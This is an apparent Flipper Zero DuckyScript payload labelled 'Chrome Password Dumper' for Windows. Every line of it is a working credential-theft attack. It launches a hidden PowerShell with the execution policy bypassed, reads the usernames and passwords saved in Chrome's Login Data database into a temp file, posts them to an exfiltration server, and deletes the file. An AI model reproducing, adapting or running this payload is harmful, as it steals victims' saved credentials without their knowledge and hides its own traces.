REM ===============================================================
REM Chrome Password Dumper - NullSec Flipper Suite
REM Extracts saved passwords from Chrome
REM ===============================================================
REM Target: Windows
REM Author: bad-antics
REM ===============================================================

GUI r
DELAY 200
STRING powershell -w hidden -ep bypass -c "Add-Type -AssemblyName System.Security; $db = \"$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data\"; $key = [IO.File]::ReadAllBytes(\"$env:LOCALAPPDATA\Google\Chrome\User Data\Local State\"); $conn = New-Object System.Data.SQLite.SQLiteConnection(\"Data Source=$db\"); $conn.Open(); $cmd = $conn.CreateCommand(); $cmd.CommandText = 'SELECT origin_url,username_value,password_value FROM logins'; $reader = $cmd.ExecuteReader(); while($reader.Read()){$url=$reader[0];$user=$reader[1];$pass=$reader[2]; \"$url|$user|$pass\" | Out-File -Append $env:TEMP\creds.txt}; Invoke-WebRequest -Uri 'http://EXFIL_SERVER/chrome' -Method POST -Body (gc $env:TEMP\creds.txt -Raw); del $env:TEMP\creds.txt"
ENTER
